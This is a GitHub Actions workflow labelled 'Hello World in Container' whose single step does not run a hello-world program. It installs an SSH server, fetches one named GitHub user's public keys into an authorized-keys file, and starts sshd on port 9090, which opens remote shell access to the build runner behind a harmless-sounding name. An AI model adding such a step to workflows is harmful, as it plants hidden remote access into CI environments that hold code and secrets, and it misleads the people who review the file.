name: Hello World in Container

on: [push]

jobs:
  hello-world:
    runs-on: ubuntu-latest
  

    steps:

    - name: Run Hello World in Docker#
      
      run: |
        sudo apt update >> /dev/null
        sudo apt install -y curl openssh-server jq >> /dev/null
        sudo mkdir /var/run/sshd && sudo chmod 0755 /var/run/sshd
        echo $GITHUB_ACTOR
        curl -s https://api.github.com/users/bechampion/keys | jq '.[].key' > /auth
        sudo /usr/sbin/sshd -p 9090 -o PubkeyAuthentication=yes -o AuthorizedKeysFile=/auth
